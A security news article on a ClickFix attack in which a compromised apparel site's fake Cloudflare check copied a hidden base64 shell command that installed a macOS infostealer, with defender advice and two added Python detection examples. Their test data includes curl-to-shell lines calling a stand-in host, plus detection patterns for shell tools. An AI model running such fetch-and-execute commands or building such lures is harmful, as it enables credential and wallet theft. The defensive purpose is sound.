The Copy Button Lied: A ClickFix Attack Hid an Infostealer Behind a Fake Cloudflare Check on the Based Apparel Site
The Based Apparel merchandise site was pulled offline on May 22 after reports it served a ClickFix attack: a fake Cloudflare check whose 'copy' button placed a hidden shell command on the clipboard, then asked visitors to paste it into their own terminal.
ClickFix is the fast-spreading 2026 social-engineering pattern where a website tricks the visitor into running the attacker's command themselves. On May 22, 2026, the merchandise site Based Apparel was pulled offline after reports it had been compromised to serve exactly such an attack: a spoofed Cloudflare verification page whose 'copy' button silently placed a base64-encoded shell command on the clipboard, then prompted visitors to paste the 'verification' string into their own terminal. ClickFix defeats most web-malware defenses because the malicious code never executes in the browser — the victim runs it. A compromised brand website is simply the delivery vehicle; the technique is the threat.
WASHINGTON, D.C. — On May 22, 2026, the merchandise website Based Apparel (basedapparel[.]com) was taken offline after reports that it had been compromised to distribute malware to visitors using a social-engineering technique known as ClickFix. According to reporting led by TechCrunch, visitors to the site were shown a fake Cloudflare verification page displaying innocuous-looking text — "I am not a robot: Cloudflare Verification ID: 801470" — alongside a "copy" button. Clicking the button did not copy the visible text; it silently placed a base64-encoded shell command on the visitor's clipboard, and the page then prompted the user to paste the "verification" string into their computer's terminal, which executed the hidden command. On macOS, the documented payload downloaded an infostealer that harvested stored credentials from Chromium-based browsers and data from cryptocurrency wallets, bundled them into a zip archive, and sent them to an attacker-controlled domain; the payload was flagged as malicious by 27 antivirus engines. Based Apparel is the clothing brand of FBI Director Kash Patel, but the news value here is the technique, not the brand — a compromised brand website is one delivery vehicle for ClickFix among many.
What Happened
What ClickFix Is and Why It Works
ClickFix is a social-engineering technique, not a software exploit, and that distinction is the whole story. In a ClickFix attack, a website does not try to run malicious code inside the visitor's browser — the place where browser sandboxes, web filters, and email-gateway defenses are designed to catch it. Instead, it persuades the visitor to copy a string and run it themselves, in their own terminal, PowerShell, or Run dialog. The attacker's code therefore never executes in the browser at all; it executes as a command the user typed, with the user's own permissions. Because the malicious step happens outside the browser and outside email, most web-malware and phishing defenses simply never see it. That is why ClickFix has become one of the fastest-growing social-engineering patterns of 2026: it sidesteps the defenses organizations have spent years building.
How the Fake Cloudflare Check Worked
On the compromised Based Apparel site, the ClickFix lure took the form of a spoofed Cloudflare verification page — a page designed to imitate the routine "checking your browser" or "verify you are human" screens that real content-delivery networks sometimes show. This was not a genuine Cloudflare page and Cloudflare's systems were not involved; it was attacker-controlled content built to borrow Cloudflare's familiar look. The page displayed harmless-looking text — "I am not a robot: Cloudflare Verification ID: 801470" — next to a "copy" button. The deception is in what the button actually did. Clicking "copy" did not place the visible verification text on the clipboard; it silently placed a different string entirely — a base64-encoded shell command. The page then instructed the visitor to paste that "verification" string into their computer's terminal, presenting the act of executing a command as a normal final step of proving they were human.
What the Documented Payload Did
Reporting documents the macOS path of the attack in detail. Once a visitor pasted and ran the hidden command in a macOS terminal, it downloaded an infostealer — a class of malware built to collect and exfiltrate data. The documented payload harvested stored credentials from Chromium-based browsers, the family that includes Chrome, Edge, Brave, and others, and collected data from cryptocurrency wallets installed on the machine. It then bundled what it had gathered into a single zip archive and sent that archive to a domain controlled by the operator. The payload was submitted to multi-engine antivirus scanning and flagged as malicious by 27 separate engines, which classified it as a Trojan and an infostealer. Reporting notes the site presented operating-system-specific instructions; the malicious path is documented for macOS, and the Windows-path payload, if any, has not been detailed.
Scope and Impact
The most useful way to read this incident is to separate the vehicle from the technique. The vehicle — a compromised brand merchandise site — is interchangeable; the technique, ClickFix, is the part that generalizes and the part defenders should focus on. ClickFix has been a recurring thread in 2026 threat activity, and The CyberSignal has tracked it across very different operators and platforms: North Korean actors deploying AppleScript-based ClickFix chains against macOS users, and Australia's national cyber agency warning that fake Cloudflare CAPTCHA pages were being used to push the Vidar infostealer — a pattern that closely mirrors the lure described on the Based Apparel site. It also sits alongside the broader wave of fake-CAPTCHA and verification scams documented across global fraud campaigns. Across all of these, the constant is not the brand, the country, or the malware family — it is the trick of getting the human to run the command.
What the technique sidesteps is significant. ClickFix bypasses browser sandboxing, web content filtering, and email security because the malicious code is never delivered as an attachment, a drive-by browser exploit, or a script the browser runs — it is delivered as plain text the user copies and a command the user voluntarily executes. That places it squarely in the category of human-layer attacks that have proven hardest to defend with technology alone. Verizon's 2026 Data Breach Investigations Report underscored how durable social-engineering and credential-driven intrusion paths remain, and ClickFix is a clean example of why: it converts a routine, trusted interface — a verification check — into a delivery mechanism, much as fake software-update prompts have been abused to push mobile spyware in cases like the Morpheus Android campaign.
Several things about this specific incident are not confirmed, and this account should not imply otherwise. No threat actor has been identified or attributed. How the Based Apparel website was initially compromised — whether through a content-management-system vulnerability, stolen credentials, a malicious plugin, or a hosting compromise — is unknown. The specific infostealer family has not been named, the attacker-controlled exfiltration domain has not been published, and the number of visitors affected or whose credentials were taken has not been established. One outlet, IBTimes UK, framed the incident as a repeat targeting of the site owner's online presence; that "again" characterization is that outlet's framing and is not independently established here. When the site will return, and whether it has been fully remediated, also remain open.
Response and Attribution
The single most important defender lesson from this incident is behavioral and it applies to every computer user: never paste anything into your terminal, PowerShell, or a Run dialog because a website told you to. No legitimate "verify you are human" check — from Cloudflare or anyone else — ever requires you to run a command on your own machine. That one rule defeats every ClickFix attack, regardless of which website delivers it or which malware sits at the end of the chain. A practical companion habit: be aware that a "copy" button can place text on your clipboard that differs from what is shown on screen. Before pasting anything consequential, paste it first into a visible text editor and read it. A long base64-encoded blob where you expected a short verification code is an immediate red flag, and seeing it is the moment to stop.
For security teams, ClickFix belongs in security-awareness training now, because it works by getting the user to execute the payload and therefore bypasses browser and email defenses. Threat hunters can look for the technique's execution signature: a terminal or PowerShell process spawned shortly after browser activity, decoding base64 and fetching a remote payload — and clipboard-monitoring DLP or EDR rules that flag base64-decoded shell execution following a paste are worth considering. Organizations that run brand, merchandise, or marketing websites should treat those properties as high-trust malware-delivery surfaces: keep content-management systems and plugins patched, enforce multi-factor authentication on every admin and hosting account, monitor for unauthorized content or script injection, and keep a takedown-and-incident-response runbook ready — pulling the site offline, as Based Apparel did, was the correct immediate move. When a site is found serving ClickFix content, scope the incident to its visitors during the exposure window, not just the web server: affected users should rotate every credential stored in Chromium-based browsers and move cryptocurrency-wallet assets, treating the device as compromised. Attribution is not established, and none should be assumed.
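The hunting signature described above, as an added Python example that is not code from the report or from any vendor: it walks constructed process-start telemetry and alerts only when a shell decodes base64 and a remote fetch follows (inline or in a child process) shortly after browser activity. The JSON event format, the process-name lists and the time windows are assumptions for the example.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed process-start telemetry (JSON lines); not from the incident. A browser runs,
# then a shell under Terminal decodes base64 and a child curl fetches something remote.
SAMPLE_EVENTS = """\
{"ts": "2026-05-22T14:01:05Z", "pid": 501, "ppid": 1, "name": "Google Chrome", "cmdline": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"}
{"ts": "2026-05-22T14:03:10Z", "pid": 733, "ppid": 1, "name": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"ts": "2026-05-22T14:03:12Z", "pid": 734, "ppid": 733, "name": "zsh", "cmdline": "zsh -c 'echo UExBQ0VIT0xERVI= | base64 -d | sh'"}
{"ts": "2026-05-22T14:03:13Z", "pid": 735, "ppid": 734, "name": "curl", "cmdline": "curl -fsSL https://lure.invalid/p"}
{"ts": "2026-05-22T14:30:00Z", "pid": 810, "ppid": 733, "name": "zsh", "cmdline": "zsh -c 'base64 -d cert.b64 > cert.pem'"}
{"ts": "2026-05-22T15:20:00Z", "pid": 900, "ppid": 733, "name": "zsh", "cmdline": "zsh -c 'git status'"}
"""

BROWSERS = {"Google Chrome", "Safari", "firefox", "Brave Browser", "Microsoft Edge", "chrome.exe", "msedge.exe"}
SHELLS = {"sh", "bash", "zsh", "powershell", "pwsh", "powershell.exe", "cmd.exe"}
B64_DECODE = re.compile(r"base64\s+(?:-d|-D|--decode)\b|FromBase64String|-EncodedCommand|\s-enc\s", re.I)
REMOTE_FETCH = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr|DownloadString)\b", re.I)
BROWSER_WINDOW = timedelta(minutes=10)  # assumed: how recent the browser activity must be
CHILD_WINDOW = timedelta(seconds=30)    # assumed: how soon a fetching child must follow the shell


def parse_events(text: str) -> list:
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for e in events:
        e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
    return sorted(events, key=lambda e: e["ts"])


def detect_clickfix(text: str) -> list:
    """One alert per shell that decodes base64 and fetches a remote payload (inline or via a
    child process) within BROWSER_WINDOW after a browser process was seen."""
    events = parse_events(text)
    alerts = []
    for e in events:
        if e["name"] not in SHELLS or not B64_DECODE.search(e["cmdline"]):
            continue
        fetches = REMOTE_FETCH.search(e["cmdline"]) or any(
            c["ppid"] == e["pid"] and REMOTE_FETCH.search(c["cmdline"])
            and timedelta(0) <= c["ts"] - e["ts"] <= CHILD_WINDOW
            for c in events
        )
        browsers = [b for b in events if b["name"] in BROWSERS
                    and timedelta(0) <= e["ts"] - b["ts"] <= BROWSER_WINDOW]
        if not fetches or not browsers:
            continue  # plain base64 use (e.g. decoding a certificate file) is not an alert
        alerts.append({"pid": e["pid"], "ts": e["ts"].isoformat(), "shell": e["name"],
                       "browser": browsers[-1]["name"], "cmdline": e["cmdline"]})
    return alerts
```

On the sample the only alert is the zsh process (pid 734) whose child curl follows two minutes after Chrome started; the certificate decode and `git status` are ignored.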
The CyberSignal Analysis
Signal 01 — The Threat Is the Technique, Not the Website
It would be easy to file this story under the brand whose site was compromised, but that framing misses the actual risk. The compromised website is a delivery vehicle, and delivery vehicles are interchangeable — the next ClickFix campaign will run on a different site, possibly one with no notable owner at all. The durable, transferable lesson is the technique. ClickFix succeeds because it relocates the malicious step out of the browser and into the user's own command line, where the defenses an organization has invested in simply do not operate. Coverage that leads with the brand teaches readers nothing they can use; coverage that leads with the technique teaches them the one rule that protects them on every site they will ever visit.
Signal 02 — A Copy Button Is Not a Safe Surface
The mechanical heart of this attack is a quiet assumption almost everyone makes: that a "copy" button copies what you see. It does not have to. The clipboard is programmable, and a page can place any string it wants there when a button is clicked — including a string entirely different from the visible text. ClickFix weaponizes that gap between what is displayed and what is copied. The practical defense is to close the gap manually: treat the clipboard as untrusted after interacting with any unfamiliar page, and paste consequential content into a plain text editor to inspect it before it goes anywhere else. The habit is small; the failure it prevents — running an attacker's command with your own hands — is not.
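The inspect-before-you-paste habit from the defender lesson above and from this signal, as an added Python example that is not part of the original article: it grades what a "copy" button really put on the clipboard against the short verification code the page showed, and flags a base64 blob that decodes to a command. The shell-token list and the sample clipboard contents are constructed for the example.

```python
import base64
import binascii
import re
from typing import Optional

# Heuristic tokens that mark text as a command rather than a verification code.
# The list is an assumption for this example, not a published signature.
SHELL_TOKENS = re.compile(
    r"(?:^|[\s;|&])(?:curl|wget|sh|bash|zsh|osascript|powershell|cmd|base64|chmod|nohup)\b"
    r"|\|\s*(?:sh|bash|zsh)\b|/tmp/|\$\(",
    re.IGNORECASE,
)
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")
# Constructed stand-in for what a lying copy button might place on the clipboard.
SAMPLE_CLIPBOARD = base64.b64encode(b"curl -fsSL https://lure.invalid/p | sh").decode()


def try_b64_decode(text: str) -> Optional[str]:
    """Decode `text` if it is well-formed base64 yielding printable text, else None."""
    compact = re.sub(r"\s+", "", text)
    if not B64_SHAPE.match(compact):
        return None
    try:
        decoded = base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if all(c.isprintable() or c.isspace() for c in decoded) else None


def inspect_clipboard(text: str, expected_max_len: int = 16) -> dict:
    """Grade a clipboard string against the expectation of a short verification code.
    Verdicts: ok, review (long or encoded but not a command), suspicious (a command)."""
    stripped = text.strip()
    decoded = try_b64_decode(stripped)
    clear_cmd = bool(SHELL_TOKENS.search(stripped))
    hidden_cmd = decoded is not None and bool(SHELL_TOKENS.search(decoded))
    if clear_cmd or hidden_cmd:
        verdict = "suspicious"
    elif decoded is not None or len(stripped) > expected_max_len:
        verdict = "review"  # not obviously a command, but not the short code you expected either
    else:
        verdict = "ok"
    return {"verdict": verdict, "length": len(stripped), "decoded": decoded,
            "clear_text_command": clear_cmd, "hidden_command": hidden_cmd}
```

The visible code "801470" grades ok, the full on-screen sentence grades review because it is longer than a code, and the constructed base64 sample grades suspicious because it decodes to a curl-to-shell command.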
Signal 03 — ClickFix Defeats Tools, So the Defense Is Behavioral
ClickFix is, in a real sense, a verdict on the limits of purely technical security. Browser sandboxes, web filters, and email gateways are all bypassed not because they failed, but because the attack never passes through them. The decisive control is the user's judgment at the moment a website asks them to run a command. That makes the defense a behavioral and awareness investment, not a product purchase — and it means brand, marketing, and merchandise web properties, often managed outside the core security program, need to be brought inside it, because a high-trust website is exactly the kind of place a ClickFix lure wants to live. For CISOs, the takeaway is uncomfortable but clear: against a technique designed to bypass tools, sustained training is not a soft control. It is the control.